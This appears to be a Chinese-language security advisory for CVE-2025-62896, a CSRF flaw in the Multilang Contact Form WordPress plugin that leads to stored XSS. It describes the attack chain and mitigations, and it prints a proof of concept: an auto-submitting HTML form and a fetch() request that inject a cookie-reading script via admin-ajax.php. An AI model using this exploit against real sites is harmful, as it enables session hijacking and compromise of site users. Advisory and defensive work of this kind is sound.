CVE-2025-62896 Multilang Contact Form 跨站请求伪造漏洞导致存储型XSS

漏洞信息

漏洞编号

CVE-2025-62896

漏洞类型

CSRF + 存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

digitaldonkey Multilang Contact Form (WordPress插件)

漏洞概述

CVE-2025-62896是WordPress插件Multilang Contact Form中的一个跨站请求伪造(CSRF)漏洞，该漏洞允许攻击者通过CSRF攻击在表单中注入恶意脚本，从而实现存储型跨站脚本(XSS)攻击。该插件版本从n/a至1.5均受影响。由于插件缺乏适当的CSRF保护机制，攻击者可以诱骗已登录的管理员或用户访问恶意构造的页面，在不知情的情况下向插件提交包含恶意JavaScript代码的表单内容。一旦恶意脚本被存储，任何访问包含该表单内容的页面的用户都会执行该脚本，可能导致会话劫持、敏感信息窃取、恶意重定向等安全问题。CVSS评分7.1，属于高危漏洞，攻击复杂度低，无需认证即可发起攻击，但需要用户交互。

技术细节

该漏洞的根本原因在于Multilang Contact Form插件缺少CSRF令牌验证机制。攻击者可以利用此漏洞构造一个恶意HTML页面，其中包含一个自动提交的表单，该表单模仿插件的正常联系表单请求。当管理员或用户访问该恶意页面时，浏览器会自动向目标WordPress站点发送POST请求，携带攻击者精心构造的XSS payload（如<script>alert(document.cookie)</script>）。由于插件未验证请求的来源合法性，该恶意内容被直接存储到数据库中。当其他用户访问显示该表单内容的页面时，存储的恶意脚本会被浏览器解析执行。攻击者可利用存储型XSS窃取用户的认证cookie、劫持用户会话、修改页面内容或进行钓鱼攻击。CVSS向量显示攻击向量为网络边界(AV:N)，攻击复杂度低(AC:L)，无需认证(PR:N)，但需要用户交互(UI:R)。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含自动提交的CSRF表单，表单数据中嵌入XSS payload

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导目标网站管理员或用户访问该恶意页面

STEP 3

步骤3

受害者浏览器自动向目标WordPress站点发送POST请求，由于插件缺乏CSRF验证，请求被接受

STEP 4

步骤4

恶意XSS payload被存储到数据库中（如联系表单配置或消息内容字段）

STEP 5

步骤5

当其他用户访问显示该表单内容的页面时，存储的恶意脚本被浏览器解析执行

STEP 6

步骤6

攻击者通过XSS窃取用户Cookie、劫持会话、修改页面内容或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for Multilang Contact Form <= 1.5 Stored XSS -->
<html>
  <body>
    <h1>CSRF Attack - Stored XSS in Multilang Contact Form</h1>
    <p>诱骗管理员访问此页面以在联系表单中注入XSS payload</p>
    
    <form action="http://target-site/wp-admin/admin-ajax.php" method="POST" id="csrf-form">
      <input type="hidden" name="action" value="multilang_contact_form_save" />
      <input type="hidden" name="message" value="<script>alert(document.cookie)<\/script>" />
      <input type="hidden" name="nonce" value="" />
    </form>
    
    <script>
      // Auto-submit the form
      document.getElementById('csrf-form').submit();
    </script>
    
    <p>或者使用以下fetch请求:</p>
    <pre>
fetch('http://target-site/wp-admin/admin-ajax.php', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
  },
  body: 'action=multilang_contact_form_save&message=<script>alert(document.cookie)<\/script>&nonce='
})
.then(response => response.json())
.then(data => console.log(data));
    </pre>
  </body>
</html>

影响范围

Multilang Contact Form <= 1.5

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制未授权用户提交表单内容；2) 启用WordPress的CSRF保护插件；3) 在Web应用防火墙(WAF)中配置规则阻止包含script标签的请求；4) 临时禁用该插件直到完成安全更新；5) 加强对管理员账户的安全防护，使用双因素认证。